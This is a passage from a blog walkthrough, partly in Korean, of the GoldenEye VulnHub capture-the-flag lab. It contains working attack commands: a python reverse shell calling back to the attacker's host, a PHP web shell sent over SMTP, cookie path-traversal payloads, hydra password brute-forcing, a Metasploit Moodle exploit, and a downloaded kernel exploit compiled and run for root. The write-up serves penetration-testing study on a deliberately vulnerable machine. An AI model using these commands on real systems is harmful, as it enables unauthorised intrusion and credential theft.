OSCP/Vulnahub
24. GoldenEye
takudaddy
2021. 4. 9. 16:31
INFO
Name : GoldenEye
Entry : 24 / 35
Level : Intermediate
VulnHub URL : https://www.vulnhub.com/entry/goldeneye-1,240/
GOAL
As with most CTFs from VulnHub, the goal is to get the text file which serves as the flag from the /root directory.
SETUP
I’m using both VMWare Workstation and Virtual box(depending on conditions of the image) to host Kali and the MisDirection image, with both VMs running in a NAT network(sometimes Bridged). I used Workstation this time.
DESCRIPTON
I recently got done creating an OSCP type vulnerable machine that's themed after the great James Bond film (and even better n64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes - flag.txt.
I'd rate it as Intermediate, it has a good variety of techniques needed to get root - no exploit development/buffer overflows. After completing the OSCP I think this would be a great one to practice on, plus there's a hint of CTF flavor.
I've created and validated on VMware and VirtualBox. You won't need any extra tools other than what's on Kali by default. Will need to be setup as Host-Only, and on VMware you may need to click "retry" if prompted, upon initially starting it up because of formatting.
TABLE OF CONTENTS
1. DISCOVERY
2. SCANNING
3. WEB RECONNAISSANCE
4. EXPLOITATION
5. POST EXPLOITATION
6. PRIVILEGE ESCALATION
1. DISCOVERY
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.20.12 00:0c:29:40:22:31 1 60 VMware, Inc.
2. SCANNING
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open ssl/unknown
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after: 2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time
55007/tcp open unknown
openssl localhost
3. WEB RECONNAISSANCE
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.24
+ /splashAdmin.php: Cobalt Qube 3 admin is running. This may have multiple security problems as described by www.scan-associates.net. These could not be tested remotely.
+ OSVDB-3233: /icons/README: Apache default file found.
cobalt qube
┌──(root💀takudaddy)-[/attack]
└─# searchsploit cobalt 1 ⨯
------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------ ---------------------------------
Cobalt 0.1 - Multiple SQL Injections | asp/webapps/5373.txt
Cobalt 2.0 - 'adminler.asp' SQL Injection | asp/webapps/31666.txt
Cobalt Linux 6.0 - RaQ (Authenticated) Privilege Escalation | unix/local/21790.sh
Cobalt Qube 3.0 - Authentication Bypass | php/webapps/21640.txt
┌──(root💀takudaddy)-[/study]
└─# cat 21640.txt
source: https://www.securityfocus.com/bid/5297/info
A vulnerability has been reported for Cobalt Qube that may allow an attacker to bypass the authentication mechanism and obtain administrative privileges.
The vulnerability occurs because of a weak authentication mechanism with Cobalt Qube appliances. The authentication mechanism fails to properly validate the input supplied in the client cookie. Thus it is possible for an attacker to refer to a file on the filesystem as that containing the session key. This vulnerability may be exploited by remote attackers to obtain administrative privileges on the device.
$curl -b sessionId=../../../../../../../../etc/passwd\;loginName=root:x:0:0:root:/root:/bin/bash
http://192.168.0.1:444/splashAdmin.php
This will allow the attacker to delete the password file.
The following will enable the attacker to obtain administrative credentials on the vulnerable system.
$curl -b sessionId=../codb/objects/4/.name\;loginName=admin
http://192.168.0.1:444/splashAdmin.php
$ curl -b sessionId=/../../../../../../tmp/test\;loginName=admin
http://192.168.0.1:444/splashAdmin.php
┌──(root💀takudaddy)-[~]
└─# curl http://192.168.20.12/splashAdmin.php
<html>
<body background="space.gif">
<h2 style="color:green;">Cobalt Qube 3 has been decommissioned</h2>
<br/>
<h3 style="color:white;">We can use this page to put up team photos, discussion, etc.
Natalya is not allowed to post here though --Boris</h3>
<br/><br/>
<hr>
<p style="color:red;">Here's me with my new sniper rifle.</p>
<br/><br/>
<img src="sniper.png">
<br/>
<hr>
<p style="color:orange;">
Boris why are you wearing shorts in that photo? You do realize you're stationed above the
Arctic circle, correct?
<br/><br/>
BTW your favorite pen broke, but I replaced it with a new special one.
<br/><br/>
Natalya "best coder" S.</p>
<hr>
<p style="color:red;">"License to Kill - Complex Grenade Launchers - No Oddjob" - Unknown"</p>
<hr>
<p style="color:white;">Greetings ya'll! GoldenEye Admin here.
<br/><br/>
For programming I highly prefer the Alternative to GCC, which FreeBSD uses.
It's more verbose when compiling, throwing warnings and such - this can easily be turned off
with a proper flag. I've replaced GCC with this throughout the GolenEye systems.
<br/><br/>
Boris, no arguing about this, GCC has been removed and that's final!
<br/><br/>
Also why have you been chatting with Xenia in private Boris? She's a new contractor that
you've never met before? Are you sure you've never worked together...?
<br/><br/>
-Admin
</p>
<hr>
<p style="color:purple;">
Janus was here
</p>
<hr>
</body>
</html>
freebsd
boris
natalya
xenia
janus
25 - smtp
┌──(root💀takudaddy)-[~]
└─# telnet 192.168.20.12 25
Trying 192.168.20.12...
Connected to 192.168.20.12.
Escape character is '^]'.
220 ubuntu GoldentEye SMTP Electronic-Mail agent
MAIL FROM: <TAKUDADDY>
250 2.1.0 Ok
RCPT TO: <boris> <natalya>
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
<?PHP system($_GET['cmd']); ?>
.
250 2.0.0 Ok: queued as B606A42354
┌──(root💀takudaddy)-[/attack]
└─# smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192.168.20.12 2 ⚙
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
┌──(root💀takudaddy)-[~]
└─# msfconsole -q
msf6 > use auxiliary/scanner/smtp/smtp_enum
msf6 auxiliary(scanner/smtp/smtp_enum) > set RHOST 192.168.20.12
RHOST => 192.168.20.12
msf6 auxiliary(scanner/smtp/smtp_enum) > set THREADS 10
THREADS => 10
msf6 auxiliary(scanner/smtp/smtp_enum) > exploit
[*] 192.168.20.12:25 - 192.168.20.12:25 Banner: 220 ubuntu GoldentEye SMTP Electronic-Mail agent
[+] 192.168.20.12:25 - 192.168.20.12:25 Users found: , backup, bin, daemon, games, gnats, irc, libuuid, list, lp, mail, man, messagebus, news, nobody, postfix, postgres, postmaster, proxy, sync, sys, syslog, uucp, www-data
[*] 192.168.20.12:25 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
//Boris, make sure you update your default password.
//My sources say MI6 maybe planning to infiltrate.
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//InvincibleHack3r
//
//BTW Natalya says she can break your codes
boris : InvincibleHack3r
nothing special
4. EXPLOITATION
┌──(root💀takudaddy)-[~]
└─# nc 192.168.20.12 55007 1 ⨯
+OK GoldenEye POP3 Electronic-Mail System
finding password for boris
┌──(root💀takudaddy)-[/attack]
└─# hydra -l boris -P /usr/share/wordlists/fasttrack.txt pop3://192.168.20.12 -s 55007 1 ⚙
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-09 13:32:31
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://192.168.20.12:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[STATUS] 64.00 tries/min, 128 tries in 00:02h, 94 to do in 00:02h, 16 active
[55007][pop3] host: 192.168.20.12 login: boris password: secret1!
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-09 13:35:20
┌──(root💀takudaddy)-[/study]
└─# nc 192.168.20.12 55007 1 ⨯
+OK GoldenEye POP3 Electronic-Mail System
USER boris
+OK
PASS secret1!
+OK Logged in.
RETR 1
+OK 544 octets
Return-Path: <root@127.0.0.1.goldeneye>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id D9E47454B1
for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: root@127.0.0.1.goldeneye
Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
.
RETR 2
+OK 373 octets
Return-Path: <natalya@ubuntu>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id C3F2B454B1
for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu
Boris, I can break your codes!
RETR 3
+OK 921 octets
Return-Path: <alec@janus.boss>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id 4B9F4454B1
for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: alec@janus.boss
Boris,
Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!
Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....
PS - Keep security tight or we will be compromised.
finding password for natalya
┌──(root💀takudaddy)-[/attack]
└─# hydra -l natalya -P /usr/share/wordlists/fasttrack.txt pop3://192.168.20.12 -s 55007 1 ⚙
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-09 13:43:32
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://192.168.20.12:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[55007][pop3] host: 192.168.20.12 login: natalya password: bird
1 of 1 target successfully completed, 1 valid password found
┌──(root💀takudaddy)-[/study]
└─# nc 192.168.20.12 55007 1 ⨯
+OK GoldenEye POP3 Electronic-Mail System
USER natalya
+OK
PASS bird
+OK Logged in.
RETR 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id D5EDA454B1
for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu
Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.
Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
RETR 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 17C96454B1
for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu
Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)
Ok, user creds are:
username: xenia
password: RCP90rulez!
Boris verified her as a valid contractor so just create the account ok?
And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....
Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.
username: xenia
password: RCP90rulez!
severnaya-station.com/gnocertdir
severnaya-station.com -> /et/chosts에 등록
┌──(root💀takudaddy)-[/study]
└─# cat /etc/hosts
127.0.0.1 localhosts
127.0.1.1 takudaddy.example.com takudaddy
192.168.20.12 severnaya-station.com
moodle
find doak's passwd and login
┌──(root💀takudaddy)-[/study]
└─# hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.20.12 -s 55007 1 ⚙
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-09 14:06:11
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://192.168.20.12:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[55007][pop3] host: 192.168.20.12 login: doak password: goat
[STATUS] 111.00 tries/min, 222 tries in 00:02h, 1 to do in 00:01h, 15 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-09 14:08:14
┌──(root💀takudaddy)-[/study]
└─# nc 192.168.20.12 55007 1 ⨯
+OK GoldenEye POP3 Electronic-Mail System
USER doak
+OK
PASS goat
+OK Logged in.
RETR 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 97DC24549D
for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu
James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?
Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......
username: dr_doak
password: 4England!
dr_doak
4England!
mails to admin user
┌──(root💀takudaddy)-[~/Downloads]
└─# cat s3cret.txt
007,
I was able to capture this apps adm1n cr3ds through clear txt.
Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.
Something juicy is located here: /dir007key/for-007.jpg
Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
┌──(root💀takudaddy)-[/study]
└─# exiftool for-007.jpg
ExifTool Version Number : 12.16
File Name : for-007.jpg
Directory : .
File Size : 15 KiB
File Modification Date/Time : 2021:04:09 14:12:44+09:00
File Access Date/Time : 2021:04:09 14:12:44+09:00
File Inode Change Date/Time : 2021:04:09 14:12:44+09:00
File Permissions : rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
X Resolution : 300
Y Resolution : 300
Exif Byte Order : Big-endian (Motorola, MM)
Image Description : eFdpbnRlcjE5OTV4IQ==
Make : GoldenEye
Resolution Unit : inches
Software : linux
Artist : For James
Y Cb Cr Positioning : Centered
Exif Version : 0231
Components Configuration : Y, Cb, Cr, -
User Comment : For 007
Flashpix Version : 0100
Image Width : 313
Image Height : 212
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 313x212
Megapixels : 0.066
Image Description : eFdpbnRlcjE5OTV4IQ==
┌──(root💀takudaddy)-[/study]
└─# echo eFdpbnRlcjE5OTV4IQ== | base64 -d
xWinter1995x!
admin : xWinter1995x!
I am Admin user now.
접속 방법 두 가지.
1. spell check 기능을 사용
change the aspell to
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.20.1",7979));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
리스너 하나 기동하고
add a new entry 들어가서 스펠링 체크하는 버튼 누르면
위에 등록한 쉘이 실행되면서 연결되어야 하는데 안됨.
안됨
2. 다른 방법
msf6 exploit(multi/http/moodle_cmd_exec) > show options
Module options (exploit/multi/http/moodle_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD xWinter1995x! yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.20.12 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SESSKEY no The session key of the user to impersonate
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /gnocertdir yes The URI of the Moodle installation
USERNAME admin yes Username to authenticate with
VHOST severnaya-station.com no HTTP server virtual host
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.20.1 yes The listen address (an interface may be specified)
LPORT 7979 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(multi/http/moodle_cmd_exec) > run
[*] Started reverse TCP double handler on 192.168.20.1:7979
[*] Authenticating as user: admin
[*] Getting session key to update spellchecker if no session key was specified
[*] Updating spellchecker to use the system aspell
[*] Triggering payload
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/moodle_cmd_exec) >
마찬가지로 안되는데
내용을 보면 spellcheker 관련 문제가 있는 듯 하다.
페이지로 돌아가 좌측 하단에 spell을 검색해 보면
spell engine이
google spell로 설정되어 있는데
이를 PSellShell 로 바꾼 후 다시 시도해 보자.
msf6 exploit(multi/http/moodle_cmd_exec) > exploit
[*] Started reverse TCP double handler on 192.168.20.1:7979
[*] Authenticating as user: admin
[*] Getting session key to update spellchecker if no session key was specified
[*] Updating spellchecker to use the system aspell
[*] Triggering payload
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo w0tDACArtSh9CqHc;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "Trying: not found\r\nsh: 2: Connected: not found\r\nsh: 3: Escape: not found\r\nw0tDACArtSh9CqHc\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (192.168.20.1:7979 -> 192.168.20.12:42194) at 2021-04-09 15:30:59 +0900
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty;pty.spawn("/bin/bash")'
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$
성공!
혹시나 처음에 시도한
python socket 연결이 될까해서
돌아가 해봤지만 안된다.
5. POST EXPLOITATION
www-data@ubuntu:/$ uname -a
uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
Linux 3.13 : Local Privilege escalation (CVE-2015-1328)
$ wget https://www.exploit-db.com/download/37292.c
> 컴파일 시킨 후 실행하면 root
www-data@ubuntu:/tmp$ which gcc
which gcc
www-data@ubuntu:/tmp$ which cc
which cc
/usr/bin/cc
www-data@ubuntu:/tmp$
헌데 gcc가 안깔려 있고 cc가 깔려있다.
해당 코드는 gcc로 컴파일 하도록 설정되어 있기 때문에
이를 cc로 수정해주는 작업이 필요.
이제 침투 서버에서 받아주고
cc로 컴파일 하면 된다.
6. PRIVILEGE ESCALATION
www-data@ubuntu:/tmp$ wget http://192.168.20.1/37292.c
wget http://192.168.20.1/37292.c
--2021-04-09 00:17:57-- http://192.168.20.1/37292.c
Connecting to 192.168.20.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5120 (5.0K) [text/x-csrc]
Saving to: '37292.c'
100%[======================================>] 5,120 --.-K/s in 0s
2021-04-09 00:17:57 (1.18 GB/s) - '37292.c' saved [5120/5120]
www-data@ubuntu:/tmp$ cc -o attack 37292.c
cc -o attack 37292.c
37292.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
37292.c:106:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
if(unshare(CLONE_NEWUSER) != 0)
^
37292.c:111:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
^
37292.c:117:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
waitpid(pid, &status, 0);
^
37292.c:127:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
wait(NULL);
^
5 warnings generated.
에러 메시지는 무시하자.
www-data@ubuntu:/tmp$ ls
ls
37292.c attack vmware-root
www-data@ubuntu:/tmp$ ./attack
./attack
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cd /root
cd /root
# ls
ls
# ls -al
ls -al
total 44
drwx------ 3 root root 4096 Apr 29 2018 .
drwxr-xr-x 22 root root 4096 Apr 24 2018 ..
-rw-r--r-- 1 root root 19 May 3 2018 .bash_history
-rw-r--r-- 1 root root 3106 Feb 19 2014 .bashrc
drwx------ 2 root root 4096 Apr 28 2018 .cache
-rw------- 1 root root 144 Apr 29 2018 .flag.txt
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
-rw------- 1 root root 1024 Apr 23 2018 .rnd
-rw------- 1 root root 8296 Apr 29 2018 .viminfo
# cat .flag.txt
cat .flag.txt
Alec told me to place the codes here:
568628e0d993b1973adc718237da6e93
If you captured this make sure to go here.....
/006-final/xvf7-flag/
끝
728x90